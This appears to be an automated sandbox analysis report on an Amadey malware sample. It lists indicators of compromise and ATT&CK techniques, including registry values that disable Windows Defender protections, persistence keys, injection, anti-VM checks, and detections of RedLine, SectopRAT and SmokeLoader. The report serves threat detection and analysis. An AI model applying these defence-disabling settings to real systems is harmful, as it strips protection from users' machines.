amadey | 4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	1ap24Pf4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	1ap24Pf4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	74F1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	74F1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	74F1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	1ap24Pf4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	1ap24Pf4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	74F1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	74F1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	74F1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	1ap24Pf4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1ap24Pf4.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/memory/2836-84-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/files/0x00060000000232f9-383.dat	family_redline
behavioral2/files/0x00060000000232f9-382.dat	family_redline
behavioral2/memory/5380-384-0x0000000000A10000-0x0000000000A4E000-memory.dmp	family_redline
behavioral2/memory/5772-566-0x0000000001FC0000-0x000000000201A000-memory.dmp	family_redline
behavioral2/memory/3728-575-0x0000000000890000-0x00000000008AE000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/3728-575-0x0000000000890000-0x00000000008AE000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 5788 created 2500	5788	cmd.exe	40
PID 5788 created 2500	5788	cmd.exe	40
PID 5788 created 2500	5788	cmd.exe	40
PID 5788 created 2500	5788	cmd.exe	40
PID 5788 created 2500	5788	cmd.exe	40

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
5372	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	5zo2be3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	708A.bat
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	76E6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	BA1A.exe

Executes dropped EXE 33 IoCs

pid	Process
1364	nT3uK77.exe
2960	fG0Iv32.exe
1200	dV2iu13.exe
3676	1ap24Pf4.exe
3872	2BM5023.exe
4144	3Sv92jt.exe
4352	4tc111Ko.exe
3296	5zo2be3.exe
5404	6E17.exe
5468	KL8OR2Ub.exe
5476	6F21.exe
5544	Gy4Mx4vi.exe
5596	708A.bat
5620	NR5Tn6kg.exe
5700	PI8Eh9it.exe
5772	734A.exe
5816	1dH72iK8.exe
5920	74F1.exe
5996	76E6.exe
4680	explothe.exe
5380	2Ib221qx.exe
3712	BA1A.exe
5772	BE51.exe
4504	C055.exe
3728	C279.exe
3744	toolspub2.exe
4064	cmd.exe
2236	source1.exe
5788	latestX.exe
4492	toolspub2.exe
5148	explothe.exe
5320	31839b57a4f11171d6abc8bbc4451ee4.exe
5864	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
5536	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	1ap24Pf4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	74F1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	1ap24Pf4.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	nT3uK77.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	dV2iu13.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	6E17.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Gy4Mx4vi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	PI8Eh9it.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	fG0Iv32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	KL8OR2Ub.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	NR5Tn6kg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Detected potential entity reuse from brand microsoft.
phishing microsoft

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3872 set thread context of 3256	3872	2BM5023.exe	93
PID 4144 set thread context of 572	4144	3Sv92jt.exe	101
PID 4352 set thread context of 2836	4352	4tc111Ko.exe	105
PID 5476 set thread context of 5716	5476	6F21.exe	149
PID 5772 set thread context of 6056	5772	734A.exe	158
PID 5816 set thread context of 6084	5816	1dH72iK8.exe	160
PID 3744 set thread context of 4492	3744	toolspub2.exe	198
PID 2236 set thread context of 4180	2236	source1.exe	208

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	cmd.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5328	sc.exe
2908	sc.exe
5312	sc.exe
4204	sc.exe
1572	sc.exe
760	sc.exe
5872	sc.exe
5136	sc.exe
6032	sc.exe
5884	sc.exe
4212	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
5108	3872	WerFault.exe	92
1184	3256	WerFault.exe	93
1632	4144	WerFault.exe	99
3220	4352	WerFault.exe	104
5960	5476	WerFault.exe	143
440	5772	WerFault.exe	150
4144	5816	WerFault.exe	151
1408	6084	WerFault.exe	160

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4124	schtasks.exe
2400	schtasks.exe
5356	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powercfg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powercfg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powercfg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powercfg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powercfg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powercfg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powercfg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powercfg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powercfg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powercfg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3676	1ap24Pf4.exe
3676	1ap24Pf4.exe
572	AppLaunch.exe
572	AppLaunch.exe
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
1836	msedge.exe
1836	msedge.exe
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
400	msedge.exe
400	msedge.exe
2500	Explorer.EXE
2500	Explorer.EXE
4428	msedge.exe
4428	msedge.exe
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE
2500	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
572	AppLaunch.exe
4492	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3676	1ap24Pf4.exe
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeDebugPrivilege	5920	74F1.exe
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
